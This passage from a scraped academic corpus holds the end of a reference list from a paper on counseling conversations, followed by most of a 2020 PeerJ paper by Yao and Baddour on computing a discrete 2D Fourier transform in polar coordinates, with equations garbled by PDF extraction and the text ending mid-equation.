Greg Cor- rado, and Jeff Dean. 2013. Distributed representa- tions of words and phrases and their compositionality. In NIPS. National Institute of Mental Health. 2015. Any mental illness (AMI) among U.S. adults. http://www.nimh.nih.gov/health/ statistics/prevalence/any-mental- illness-ami-among-us-adults.shtml. Retrieved June 3, 2016. Kate G. Niederhoffer and James W. Pennebaker. 2002. Linguistic style matching in social interaction. Jour- nal of Language and Social Psychology, 21(4). Michael J. Paul. 2012. Mixed membership Markov models for unsupervised conversation modeling. In EMNLP-CoNLL. James W. Pennebaker, Matthias R. Mehl, and Kate G. Niederhoffer. 2003. Psychological aspects of natural language use: Our words, our selves. Annual Review of Psychology, 54(1). John P. Pestian, Pawel Matykiewicz, Michelle Linn-Gust, Brett South, Ozlem Uzuner, Jan Wiebe, Kevin B. Co- hen, John Hurdle, and Christopher Brew. 2012. Senti- ment analysis of suicide notes: A shared task. Biomed- ical informatics insights, 5(Suppl. 1). Tom Pyszczynski and Jeff Greenberg. 1987. Self- regulatory perseveration and the depressive self- focusing style: A self-awareness theory of reactive de- pression. Psychological Bulletin, 102(1). Tom Pyszczynski, Kathleen Holt, and Jeff Greenberg. 1987. Depression, self-focused attention, and ex- pectancies for positive and negative future life events for self and others. Journal of Personality and Social Psychology, 52(5). Nairan Ramirez-Esparza, Cindy Chung, Ewa Kacewicz, and James W. Pennebaker. 2008. The psychology of word use in depression forums in English and in Span- ish: Testing two text analytic approaches. In ICWSM. Shiquan Ren, Hong Lai, Wenjing Tong, Mostafa Amin- zadeh, Xuezhang Hou, and Shenghan Lai. 2010. Non- parametric bootstrapping for hierarchical data. Jour- nal of Applied Statistics, 37(9). Alan Ritter, Colin Cherry, and Bill Dolan. 2010. Unsu- pervised modeling of Twitter conversations. In HLT- NAACL. Harvey Sacks and Gail Jefferson. 1995. Lectures on con- versation. Wiley-Blackwell. Andreas Stolcke, Klaus Ries, Noah Coccaro, Eliza- beth Shriberg, Rebecca Bates, Daniel Jurafsky, Paul Taylor, Rachel Martin, Carol Van Ess-Dykema, and Marie Meteer. 2000. Dialogue act modeling for automatic tagging and recognition of conversational speech. Computational Linguistics, 26(3). Yla R. Tausczik and James W. Pennebaker. 2010. The psychological meaning of words: LIWC and comput- erized text analysis methods. Journal of Language and Social Psychology, 29(1). http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml Teun Van Dijk. 1997. Discourse studies: A multidisci- plinary approach. SAGE. World Health Organization. 2015. Depression: Fact sheet no 369. http://www.who.int/ mediacentre/factsheets/fs369/en/. Re- trieved November 2, 2015. Jaewon Yang, Julian McAuley, Jure Leskovec, Paea LePendu, and Nigam Shah. 2014. Finding pro- gression stages in time-evolving event sequences. In WWW. http://www.who.int/mediacentre/factsheets/fs369/en/ http://www.who.int/mediacentre/factsheets/fs369/en/ Introduction Related Work Dataset Description Defining Counseling Quality Counselor Adaptability Reacting to Ambiguity Initial Ambiguity and Situation Setter How to Respond to Ambiguity Response Templates and Creativity Ensuring Conversation Progress Unsupervised Conversation Model Analyzing Counselor Progression Coordination and Power Differences Facilitating Perspective Change Predicting Counseling Success Conclusion & Future Work work_vaxtuleo6nfo7eq2dpcoadhgxa ---- Discrete two dimensional Fourier transform in polar coordinates part II: numerical computation and approximation of the continuous transform Discrete two dimensional Fourier transform in polar coordinates part II: numerical computation and approximation of the continuous transform Xueyang Yao1 and Natalie Baddour2 1 Department of Systems Design Engineering, University of Waterloo, Waterloo, ON, Canada 2 Department of Mechanical Engineering, University of Ottawa, Ottawa, ON, Canada ABSTRACT The theory of the continuous two-dimensional (2D) Fourier Transform in polar coordinates has been recently developed but no discrete counterpart exists to date. In the first part of this two-paper series, we proposed and evaluated the theory of the 2D Discrete Fourier Transform (DFT) in polar coordinates. The theory of the actual manipulated quantities was shown, including the standard set of shift, modulation, multiplication, and convolution rules. In this second part of the series, we address the computational aspects of the 2D DFT in polar coordinates. Specifically, we demonstrate how the decomposition of the 2D DFT as a DFT, Discrete Hankel Transform and inverse DFT sequence can be exploited for coding. We also demonstrate how the proposed 2D DFT can be used to approximate the continuous forward and inverse Fourier transform in polar coordinates in the same manner that the 1D DFT can be used to approximate its continuous counterpart. Subjects Algorithms and Analysis of Algorithms, Scientific Computing and Simulation, Theory and Formal Methods Keywords Fourier theory, DFT in polar coordinates, Polar coordinates, Multidimensional DFT, Discrete Hankel Transform, Discrete Fourier Transform, Orthogonality INTRODUCTION The Fourier Transform (FT) is a powerful analytical tool and has proved to be invaluable in many disciplines such as physics, mathematics and engineering. The development of the Fast Fourier Transform (FFT) algorithm (Cooley & Tukey, 1965), which computes the Discrete Fourier Transform (DFT) with a fast algorithm, firmly established the FT as a practical tool in diverse areas, most notably signal and image processing. In two dimensions, the FFT can still be used to compute the DFT in Cartesian coordinates. However, in many applications such as photoacoustics (Xu, Feng & Wang, 2002) and tomography (Scott et al., 2012; Fahimian et al., 2013; Lee et al., 2008; Lewitt & Matej, 2003), it is often necessary to compute the FT in polar coordinates. Moreover, for functions that are naturally described in polar coordinates, a discrete version of the 2D FT in polar coordinates is needed. There have been some attempts to calculate the FT in polar coordinates, most notably through the Hankel transform, since the zeroth order How to cite this article Yao X, Baddour N. 2020. Discrete two dimensional Fourier transform in polar coordinates part II: numerical computation and approximation of the continuous transform. PeerJ Comput. Sci. 6:e257 DOI 10.7717/peerj-cs.257 Submitted 12 July 2019 Accepted 19 January 2020 Published 2 March 2020 Corresponding author Natalie Baddour, nbaddour@uottawa.ca Academic editor Yilun Shang Additional Information and Declarations can be found on page 36 DOI 10.7717/peerj-cs.257 Copyright 2020 Yao and Baddour Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.257 mailto:nbaddour@�uottawa.�ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.257 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ Hankel transform is known to be a 2D FT in polar coordinates for rotationally symmetric functions. However, prior work has focused on numerically approximating the continuous transform. This stands in contrast to the FT, where the DFT can stand alone as an orthogonal transform, independent of the existence of its continuous counterpart. The idea of a Polar FT has been previously investigated, where the spatial function is in Cartesian coordinates but its FT is computed in polar coordinates (Averbuch et al., 2006; Abbas, Sun & Foroosh, 2017; Fenn, Kunis & Potts, 2007). FTs have been proposed for non-equispaced data, referred to as Unequally Spaced FFT (USFFT) or Non-Uniform FFT (NUFFT) (Dutt & Rokhlin, 1993; Fourmont, 2003; Dutt & Rokhlin, 1995; Potts, Steidl & Tasche, 2001; Fessler & Sutton, 2003). A recent book gives a unified treatment of these topics (Plonka et al., 2018). Previous work has also considered the implications of using a polar grid (Stark, 1979; Stark & Wengrovitz, 1983). Although the above references demonstrate that the computation of a discrete 2D FT on a polar grid has previously been considered in the literature, there is to date no discrete 2D FT in polar coordinates that exists as a transform in its own right, with its own set of rules of the actual manipulated quantities. In part I of this two part series, we proposed an independent discrete 2D FT in polar coordinates, which has been defined to be discrete from first principles (Baddour, 2019). For a discrete transform, the values of the transform are only given as entries in a vector or matrix and the transform manipulates a set of discrete values. To quote Bracewell (Bracewell, 1999), “we often think of this as though an underlying function of a continuous variable really exists and we are approximating it. From an operational viewpoint, however, it is irrelevant to talk about the existence of values other than those given and those computed (the input and output). Therefore, it is desirable to have a mathematical theory of the actual quantities manipulated”. Hence, in our previous paper (Baddour, 2019), standard operational ‘rules’ of shift, modulation and convolution rules for this 2D DFT in polar coordinates were demonstrated. The operational rules were demonstrated via the key properties of the proposed discrete kernel of the transform. However, using the discrete kernel may not be the most effective way to compute the transform. Furthermore, while the 2D DFT in polar coordinates was demonstrated to have properties and rules as a standalone transform independent of its relationship to any continuous transform, an obvious application of the proposed discrete transform is to approximate its continuous counterpart. Hence, the goal of this second part of this two-part paper series is to propose computational approaches to the computation of the previously proposed 2D DFT in polar coordinates and also to validate its effectiveness to approximate the continuous 2D FT in polar coordinates. The outline of the paper is as follows. “Definition of the Discrete 2D FT in Polar Coordinates” states the proposed definition of the discrete 2D FT in polar coordinates. The motivation of this definition and the transform rules (multiplication, convolution, Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 2/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ shift etc.) are given in the first part of this two-part paper. The transform exists in its own right and manipulates discrete quantities that do not necessarily stem from sampling an underlying continuous quantity. Nevertheless, the motivation for the definition of the transform is based on an implied underlying discretization scheme. “Discrete Transform to approximate the continuous transform” introduces the implied underlying discretization scheme where we show the connection between discrete samples of the continuous functions and the discrete transform, should it be desirable to interpret the transform in this manner. Here, the connection between using the proposed 2D DFT and sampled vales of the continuous functions is explained. The proposed 2D DFT was motivated by a specific sampling scheme (Discrete Transform to approximate the continuous transform) which can be plotted and analyzed for “grid coverage”—how much of the 2D plane is covered and at which density. Thus, “Discretization Points and Sampling Grid” analyzes the proposed discretization points and their implication on the sampling grid for density and coverage of the grid. The insights gained from this section will be useful in interpreting the results of approximating the continuous transform with the discrete transform. “Numerical Computation of the Transform” introduces numerical computation schemes whereby the interpretation of the proposed 2D transform as a sequence of 1D DFT, 1D Discrete Hankel Transform (DHT) and 1D inverse DFT (IDFT) is exploited. “Numerical Evaluation of the 2D DFT in Polar Coordinates to Approximate the Continuous FT” then investigates the ability of the proposed 2D DFT to approximate the continuous transform in terms of precision and accuracy. Three test functions for which closed-form continuous transforms are known are analyzed. Finally, “Summary and Conclusion” summarizes and concludes the paper. DEFINITION OF THE DISCRETE 2D FT IN POLAR COORDINATES The 2D-DFT in polar coordinates has been defined in the first part of this two-paper series as the discrete transform that takes the matrix (or double-subscripted series) fpk to the matrix (double-subscripted series) Fql such that fpk ! Fqm is given by Fqm ¼ F fpk � � ¼ XN1�1 k¼1 XM p¼�M fpkE � qm;pk (1) where p; k; q; m; n, N1, and N2 are integers such that �M � n � M, where 2M þ 1 ¼ N2 1 � m; k; � N1 � 1 and �M � p; q � M. Unless otherwise stated, in the remainder of the paper it shall be assumed that p; k; q; m; n, N1, and N2 are within these stated ranges. Similarly, for the inverse transform we propose fpk ¼ F�1 Fqm � � ¼ XN1�1 m¼1 XM q¼�M FqmE þ qm;pk (2) Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 3/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ In Eqs. (1) and (2), E�qm;pk are the kernels of the transformation. These can be chosen as the “non-symmetric” form given by E�qm;pk ¼ 1 N2 XM n¼�M Jn jnkjnm jnN1 � � j2nN1J 2 nþ1 jnkð Þ 2i�ne �i 2pnpN2 e þi 2pnqN2 Eþqm;pk ¼ 1 N2 XM n¼�M Jn jnmjnk jnN1 � � J2nþ1 jnmð Þ 2iþne þi 2pnpN2 e �i 2pnqN2 (3) Here, Jn zð Þ is the nth order Bessel function of the first kind and jnk denotes the kth zero of the nth Bessel function. The subscript (+ or −) indicated the sign on the i� and on the exponent containing the p variable; the q variable exponent then takes the opposite sign. From a matrix point of view, both fpk and Fql are N2 � N1 � 1ð Þ sized matrices. The form of the kernel in Eq. (3) arises naturally from discretization of the continuous transform, but does not lead to the expected Parseval relationship. A possible symmetric kernel is discussed in the first part of this two-part paper and Parseval relationships are discussed further there (Baddour, 2019). DISCRETE TRANSFORM TO APPROXIMATE THE CONTINUOUS TRANSFORM In this section, relationships between discretely sampled values of the function and its continuous 2D FT are presented in the case of a space-limited or band-limited function. These relationships were derived in the first part of the paper and are repeated here to demonstrate how they form the basis for the using the discrete transform to approximate the continuous transform at specified sampling points. Space-limited functions Consider a function in the space domain f ðr; uÞ which is space limited to r 2 0; R½ �. This implies that the function is zero outside of the circle bounded by r 2 0; R½ �. An approximate relationship between sampled values of the continuous function and sampled values of its continuous forward 2D transform F r; cð Þ has been derived in the first part of the two-part paper as F jqm R ; 2pq N2 � � �2pR2 XN1�1 k¼1 XM p¼�M f jpkR jpN1 ; 2pp N2 � � 1 N2 XM n¼�M 2i�nJn jnkjnm jnN1 � � j2nN1J 2 nþ1 jnkð Þ e �i 2pnpN2 e þi 2pnqN2 (4) Similarly, an approximate relationship between sampled values of the continuous forward transform F r; cð Þ and sampled values of the continuous original function f ðr; uÞ was shown to be given by f jpkR jpN1 ; 2pp N2 � � � 1 2pR2 XN1�1 m¼1 XM q¼�M F jqm R ; 2pq N2 � � 1 N2 XM n¼�M 2inJn jnmjnk jnN1 � � J2nþ1 jnmð Þ e þi 2pnpN2 e �i 2pnqN2 (5) Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 4/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ In Eqs. (4) and (5), f(r, θ) is the original function in 2D space and Fðr; cÞ is the 2D FT of the function in polar coordinates. To evaluate if the 2D DFT as proposed in Eqs. (1) and (2) can be used to approximate sampled values of f(r, θ) and Fðr; cÞ, the process is as follows. For the forward transform, we start with the continuous f(r, θ), evaluate it at the sampling points and then assign this value to fpk via fpk ¼ f jpkR jpN1 ; 2pp N2 � � (6) Then, Fqm is calculated from the 2D DFT scaled by 2pR 2, Eq. (1), that is Fqm ¼ 2pR2F fpk � � ¼ 2pR2 XN1�1 k¼1 XM p¼�M fpkE � qm;pk (7) The factor of 2pR2 is necessary so that the evaluation in Eq. (7) matches the expression in Eq. (4). To evaluate if the proposed 2D DFT can be used to approximate the continuous transform, the question becomes how well Fqm calculated from the 2D DFT in Eq. (7) approximates F jqm R ; 2pq N2 � � —the values of the continuous 2D FT evaluated on the sampling grid. To evaluate the inverse 2D DFT, the process is similar. We start with the continuous Fðr; cÞ, evaluate it at the sampling points and assign this value to Fqm via Fqm ¼ F jqm R ; 2pq N2 � � (8) Now, fpk is calculated from a scaled version of the inverse 2D DFT, Eq. (2) that is fpk ¼ 1 2pR2 F�1 Fqm � � ¼ 1 2pR2 XN1�1 m¼1 XM q¼�M FqmE þ qm;pk (9) To evaluate if the proposed transform can approximate the continuous transform, the question becomes how well fpk calculated from Eq. (9) approximates f jpkR jpN1 ; 2pp N2 � � —the values of the continuous function evaluated on the sampling grid. Band-limited functions The process for band-limited functions follows the same process as outlined in the previous section, with the exception that the sampling points and scaling factors are slightly different as they are now given in terms of the band limit rather than the space limit. Now consider functions in the frequency domain F q; cð Þ with an effective band limit r 2 0; Wr � . That is, we suppose that the 2D FT F r; cð Þ of f ðr; uÞ is band-limited, meaning that F r; cð Þ is zero for r � Wr ¼ 2pW. The variable Wr is written in this form since W would typically be quoted in units of Hz (cycles per second) if using temporal units or cycles per meter if using spatial units. Therefore, the multiplication by 2p ensures that the final units are in s�1 or m�1. The approximate relationship between sampled Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 5/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ values of the continuous 2D FT F r; cð Þ and sampled values of the original continuous function f r; uð Þ was derived in the first part of the paper and is given by F jqmWr jqN1 ; 2pq N2 � � � 2p W2r XN1�1 k¼1 XM p¼�M f jpk Wr ; 2pp N2 � � 1 N2 XM n¼�M 2i�nJn jnmjnk jnN1 � � J2nþ1 jnkð Þ e �i 2pnpN2 e þi 2pnqN2 (10) Similarly, the inverse relationship between sampled values of F r; cð Þ and sampled values of f ðr; uÞ was shown to be given by f jpk Wr ; 2pp N2 � � � W2r 2p XN1�1 m¼1 XM q¼�M F jqmWr jqN1 ; 2pq N2 � � 1 N2 XM n¼�M 2inJn jnkjnm jnN1 � � j2nN1J 2 nþ1 jnmð Þ e �i 2pnqN2 e þi 2pnpN2 (11) The relationships in Eqs. (10) and (11) give relationships between the sampled values of the original function and sampled values of its 2D FT. To evaluate the forward 2D DFT, we start with f r; uð Þ, evaluate it at the (bandlimited specific) sampling points and assign this value to fpk via fpk ¼ f jpk Wr ; 2pp N2 � � (12) Then, Fqm is calculated from the discrete transform scaled by 2p W2r , Eq. (1), that is Fqm ¼ 2p W2r F fpk � � ¼ 2p W2r XN1�1 k¼1 XM p¼�M fpkE � qm;pk (13) To evaluate if the proposed 2D DFT can be used to approximate the continuous transform, the question is how well Fqm calculated from Eq. (13) approximates F jqmWr jqN1 ; 2pq N2 � � , which are the values of the continuous 2D FT, evaluated on the sampling grid. The evaluation of the inverse transform for the band-limited function proceeds similarly by comparing values obtained from the inverse 2D DFT to the values obtained by sampling the continuous function directly. The relationships given by Eqs. (4), (5), (10) and (11), were the motivating definition of a 2D DFT in polar coordinates, defined in the first part of this two-part paper. In the context of this second part of the two-part paper, they are also the relationships that permit the use of the discrete transform to approximate the continuous transform at the specified sampling points. They are also the relationships that permit the examination of whether the discrete quantities fpk and Fqm calculated via the proposed 2D DFT are in fact reasonable approximations to the sampled values of the continuous functions, as stated in the objectives of the paper. DISCRETIZATION POINTS AND SAMPLING GRID The transforms defined in Eqs. (1) and (2) can be applied to any matrix fpk to yield its forward transform Fqm, which can then be transformed backwards by using the inverse transform. However, if these same discrete transforms are to be used for the purpose of approximating a continuous 2D FT, then these transforms need to be applied to the Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 6/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ specific sampled values of the continuous functions in both space and frequency domains, as shown in Eqs. (6), (8) and (12). The relationships in Eqs. (4) and (10) define the sampling points that need to be used and it is noted that the points are defined differently based on whether we start with the assumption of a space or band limited function. These specific sampling points imply a specific sampling grid for the function. In this section, the sampling grid (its coverage and density in 2D) is analyzed. Sampling points For a space-limited function, we assume that the original function of interest is defined over continuous r; uð Þ space where 0 � r � R and 0 � u � 2p. The discrete sampling spaces used for radial and angular sampling points in regular~r space r; uð Þ and ~v frequency r; cð Þ space are defined as rpk ¼ jpkR jpN1 up ¼ p2p N2 (14) and rqm ¼ jqm R cq ¼ q2p N2 (15) For a band limited function, the function is assumed band-limited to 0 � r � Wr, 0 � c � 2p. The sampling space used for radial and angular sampling points in regular ~v frequency space r; cð Þ and~r space r; uð Þ for a bandlimited function is defined as rpk ¼ jpk Wr up ¼ p2p N2 (16) and rqm ¼ jqmWr jqN1 cq ¼ q2p N2 (17) Clearly, the density of the sampling points depends on the numbers of points chosen, that is on N1 and N2. Also clear is the fact that the grid is not equispaced in the radial variable. The sampling grid for a space-limited function are plotted below to enable visualization. In the first instance, the polar grids are plotted for the case R ¼ 1, N1 ¼ 16 and N2 ¼ 15. These are shown in space (r space) and frequency (ρ space) in Figs. 1 and 2 respectively. It should be noted that although we refer the grids in this article as polar grids, they are not true polar grids in the sense of equispaced sampling in the radial and angular coordinates. Clearly, the grids in Figs. 1 and 2 are fairly sparse, but the low values of N2 and N1 have been chosen so that the structure of the sampling points can be easily seen. It can be observed that there is a hole at the center area in both domains which is caused by the special sampling points. For higher values of the N2 and N1, the grid becomes fairly dense, obtaining good coverage of both spaces, but details are harder to observe. To demonstrate, Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 7/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ the polar grids are plotted for the case R = 1, N1 ¼ 96 and N2 ¼ 95. These are shown in Figs. 3 and 4 respectively. From Figs. 3 and 4, by choosing higher values of N1 and N2, the sampling grid becomes denser, however there is still a gap in the center area. The sampling grids for band-limited functions are not plotted here since the sample grid for a band-limited function has the same shape as with space limited function but the domains are reversed. Sample grid analysis From part I of the paper, it was shown that the 2D-FT can be interpreted as a DFT in the angular direction, a DHT in the radial direction and then an IDFT in the angular direction. Hence, the sample size in the angular direction could have been decided by the Nyquist sampling theorem (Shannon, 1984), which states that fs > 2fmax (18) where fs is the sample frequency and fmax is the highest frequency or band limit. In the radial direction, the necessary relationship for the DHT is given by Baddour & Chouinard (2015) WrR ¼ jnN1 (19) Figure 1 Spatial sampling grid for a space-limited function with R = 1, N1 = 16 and N2 = 15. Full-size DOI: 10.7717/peerj-cs.257/fig-1 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 8/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-1 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ where Wr is the effective band-limit, R is the effective space limit and jnN is the Nth zero of Jn rð Þ. For the 2D FT, since �M � p � M, the order of the Bessel zero ranges from �M to M, the required relationship becomes minðjpN1Þ � WrR (20) The relationships jnN ¼ j�nN and j0N1 < j�1N1 < j�2N1 < … < j�MN1 are valid (Lozier, 2003), hence Eq. (20) can be written as j0N1 � WrR (21) It is pointed out in Baddour (2019) and Guizar-Sicairos & Gutiérrez-Vega (2004) that the zeros of Jn zð Þ are almost evenly spaced at intervals of p and that the spacing becomes exactly p in the limit as z ! 1. The reader unfamiliar with Bessel functions is directed to references (Bracewell, 1999; Lozier, 2003). In fact, it is shown in Dutt & Rokhlin (1993) that a simple asymptotic form for the Bessel function is given by Jn zð Þ � ffiffiffiffiffiffi 2 pz r cos z � n þ 1 2 � � p 2 � � (22) Figure 2 Frequency space sampling grid for a space-limited function with R = 1, N1 = 16 and N2 = 15. Full-size DOI: 10.7717/peerj-cs.257/fig-2 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 9/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-2 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Therefore, an approximation to the Bessel zero, jnk is given by jnk � 2k þ n � 1 2 � � p 2 (23) Hence, Eq. (21) can be written to choose N1 approximately as N1p � WrR ¼ 2pWR ) N1 � 2WR (24) where the reader is reminded that the units of W is m−1 (the space equivalent of Hz). N1=R is the spatial sampling frequency and we see that Eq. (24) effectively makes the same statement as Eq. (18), as it should. Intuitively, more sample points lead to more information captured, which gives an expectation that increasing N1 or N2 individually will give a better sampling grid coverage. However, it can be seen from Figs. 1–4 that there is a gap in the center of the sample grid. From Eqs. (14) and (15), the area of the gap in the center is related to the ranges of p and k, that is N2 and N1. In the sections below, it is assumed that the sampling theorems are already satisfied (that is, an appropriate space and band limit is selected) and the relationship between N2, N1 and the size of the gap will be discussed. Figure 3 Spatial sampling grid for a space-limited function with R = 1, N1 = 96 and N2 = 95. Full-size DOI: 10.7717/peerj-cs.257/fig-3 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 10/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-3 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Space-limited function In this section, it is assumed that the function is a space limited function, defined in r 2 ½0; R�. The sampling points are defined as Eq. (14) in the space domain and Eq. (15) in the frequency domain. In the following, a relationship between N2, N1 and the area of the gap in both domains is discussed. Sample grid in the space domain In the space domain, the effective limit in the space domain, R, is fixed. To analyze how the values of N2 and N1 affect the coverage of the grid in space domain, consider the following definition of ‘grid coverage’ Ar ¼ pR2 � p�r2 pR2 100 (25) where �r denotes the average radius of the gap (the hole in the middle of the grid). Ar as defined in Eq. (25) is a measure of the “grid coverage” since it gives a percentage of how much of the original space limited domain area is captured by the discrete grid. For example, if the average radius of the center gap is zero, then Ar would be 100%, that is, complete coverage. Based on the observation of Figs. 1 and 3, the relationship Figure 4 Frequency space sampling grid for a space-limited function with R = 1, N1 = 96 and N2 = 95. Full-size DOI: 10.7717/peerj-cs.257/fig-4 Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 11/38 http://dx.doi.org/10.7717/peerj-cs.257/fig-4 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ r01 < r�11 < r�21 < r�M1 is valid. Therefore, from Eq. (14), the average radius of the gap is given by �r ¼ ðr01 þ rM1Þ 2 ¼ 1 2 j01 j0N1 R þ jM1 jMN1 R � � (26) Hence, Eq. (25) for grid coverage can be written as Ar ¼ 1 � 1 4 j01 j0N1 þ jM1 jMN1 � �2" # 100 (27) Table 1 shows the different values of grid coverage Ar as the values of N1 and N2 are changed. From Table 1, it can be seen that increasing N1 (sample size in the radial direction) tends to increase the grid coverage. Since the effective space limit R is fixed, from Eq. (21) it follows that increasing N1 actually increases the effective band limit. However, increasing N2 (sample size in angular direction) will result in a bigger gap in the center of the grid, which then decreases the coverage. Sample grid in the frequency domain Similarly, coverage of the grid in the frequency domain is defined as Ar ¼ pW2r � p�r2 pW2r 100 (28) where �r denotes the average radius of the gap. Since �r ¼ ðr01 þ rM1Þ 2 ¼ ðj01 þ jM1Þ 2R (29) Then, it follows that Eq. (28) for frequency domain grid coverage can be written as Ar ¼ 1 � ðj01 þ jM1Þ2 4R2W2r " # 100% (30) From Eq. (30), it can be observed that the sample grid coverage in the frequency domain is affected by R, Wr and M. Since N2 ¼ 2M þ 1, in order to get a better grid coverage with a fixed Wr, R and N2 can be adjusted. Table 2 shows the grid coverage Ar for different values of R and N2. From Table 2, the conclusion for the frequency domain is that when the effective band limit is fixed, increasing R (effective space limit) tends to increase the coverage in the Table 1 Spatial grid coverage, Ar, with respect to different values of N1 and N2 (R is fixed). N2 N1 15 75 150 300 15 Ar = 98.48% Ar = 99.92% Ar = 99.98% Ar = 99.99% 75 Ar = 93.78% Ar = 99.36% Ar = 99.81% Ar = 99.95% 151 Ar = 90.14% Ar = 98.42% Ar = 99.46% Ar = 99.84% 301 Ar = 86.17% Ar = 96.58% Ar = 98.59% Ar = 99.51% Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 12/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ frequency domain, while increasing N2 (sample size in the angular direction) decreases the coverage. However, from Eq. (21) it should be noted that to satisfy the sampling theorem, increasing R with fixed Wr requires an increase in N1 at the same time. Band-limited function In this section, we suppose that the function is an effectively band limited function, defined on r 2 ½0; Wp�. The sampling points are defined as in Eq. (16) in the space domain and as in the frequency domain. In this subsection, the relationship between N2, N1 and the area of the gap in both domains is discussed. Sampling grid in the space domain The same definition of grid coverage in the space domain will be used as in Eq. (25). Since the sampling points of a band-limited function are given by Eqs. (16) and (17), the average radius of the gap can be defined as �r ¼ ðr01 þ rM1Þ 2 ¼ 1 2 j01 Wr þ jM1 Wr � � (31) Therefore, the coverage of the grid in space domain can be written as Ar¼ 1 � ðj01 þ jM1Þ2 4W2rR 2 " # 100 (32) It can be observed that the grid coverage in the space domain of a band-limited function is the same as the grid coverage in the frequency domain of space limited function. Sample grid in frequency domain The coverage of the grid in the frequency domain of a band limited function is defined by Eq. (28). With sampling points defined in Eq. (17), the average radius of the gap can be defined as �r ¼ ðr01 þ rM1Þ 2 ¼ 1 2 j01 j0N1 Wr þ jM1 jMN1 Wr � � (33) The coverage of the grid in frequency domain can be written as Ar ¼ 1 � 1 4 j01 j0N1 þ jM1 jMN1 � �2" # 100 (34) It can be observed that the grid coverage in the frequency domain of a band-limited function is the same as the grid coverage in the space domain of a space limited function. Table 2 Frequency grid coverage, Aρ, with respect to different values of R and N2 (Wρ is fixed). N2 R 15 75 150 300 15 Aρ = 99.80% Aρ = 99.99% Aρ = 100.00% Aρ = 100.00% 75 Aρ = 97.66% Aρ = 99.91% Aρ = 99.98% Aρ = 99.99% 151 Aρ = 91.88% Aρ = 99.68% Aρ = 99.92% Aρ = 99.98% 301 Aρ = 70.67% Aρ = 98.83% Aρ = 99.71% Aρ = 99.93% Yao and Baddour (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.257 13/38 http://dx.doi.org/10.7717/peerj-cs.257 https://peerj.com/computer-science/ Conclusion Based on the discussion above, the following conclusions can be made: 1. Increasing N2 (angular direction) tends to decrease the sampling grid coverage in both domains. Increasing N1 (radial direction) tends to increase the sampling coverage in the space domain for a space-limited function and in the frequency domain for a frequency-limited function. So, if a signal changes sharply in the angular direction such that large values of N2 are needed, a large value of N1 is also needed to compensate for the effect of increasing N2 on the grid coverage. 2. For a space-limited function, if there is a lot of energy at the origin in the space domain, a larger value of N1 will be required to ensure that the sampling grid gets as close to the origin as possible in the space domain. If the function has a lot of energy at the origin in the frequency domain, a large value for both N1 and R will be required to ensure adequate grid coverage. 3. For a band-limited function, if there is a lot of energy at the origin in the frequency domain, a large value of N1 will be needed to ensure that the sample grid gets as close to the origin as possible in the frequency domain. If the function has a lot of energy at the origin in the space domain, large values for both N1 and Wr are required. NUMERICAL COMPUTATION OF THE TRANSFORM We have already demonstrated in part I of the paper that the discrete 2D FT in polar coordinates can be interpreted as a DFT, DHT and then IDFT. This interpretation is quite helpful in coding the transform and in exploiting the speed of the FFT (Fast Fourier Transform) in implementing the computations. In this section, we explain how the speed of Matlab’s (Mathworks 2018) built-in code (or similar software) can be exploited to implement the 2D DFT in polar coordinates. Forward transform The values fpk can be considered as the entries in a matrix. To transform fpk ! Fqm, the operation is performed as a sequence of steps which are a 1D DFT (column-wise), followed by a scaled 1D DHT (row-wise), finally followed by a 1D IDFT (column-wise). The reader is reminded that the range of indices is given by m; k ¼ 1 . . . N1 � 1 and n; p; q ¼ �M . . . M, where 2M þ 1 ¼ N2. These steps can be summarized succinctly by rewriting Eq. (1) as Fqm ¼ 1 N2 XM n¼�M 2pR2i�n jnN1 XN1�1 k¼1 YnN1m;k XM p¼�M fpke �in 2ppN2 |fflfflfflfflfflfflfflfflfflfflffl{zfflfflfflfflfflfflfflfflfflfflffl} 1D DFT column‐wise 2 66664 3 77775 